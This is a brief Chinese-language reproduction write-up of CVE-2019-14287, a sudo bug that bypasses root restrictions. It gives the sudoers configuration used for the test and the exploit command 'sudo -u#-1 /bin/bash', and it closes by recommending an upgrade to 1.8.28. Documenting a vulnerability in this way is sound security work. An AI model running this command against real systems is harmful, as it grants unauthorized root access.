0x01 前言
Sudo 的全称是“superuserdo”,它是Linux系统管理指令,允许用户在不需要切换环境的前提下以其它用户的权限运行应用程序或命令,通常是以 root 用户身份运行命令,以减少 root 用户的登录和管理时间,同时提高安全性。
2019年10月14日,Sudo官方发布了Sudo 1.8.28版本,其中包含sudo root权限绕过漏洞的补丁修复,该漏洞编号为CVE-2019-14287。
0x02 漏洞复现
环境:
Linux parrot
Linux parrot 4.19.37-parrot1-amd64 #1 SMP Parrot 4.19.37-5parrot1 (2019-06-22) x86_64 GNU/Linux
前提,查看sudo版本,确定是否小于1.8.28
sudo -V
编辑/etc/sudoers文件,增加对shungg账户设置的权限
vi /etc/sudoers
shungg ALL=(ALL,!root) /bin/bash
wq!
保存退出.
shungg用户登录执行
sudo -u#-1 /bin/bash
漏洞利用成功。
0x03 修复建议
升级到最新版1.8.28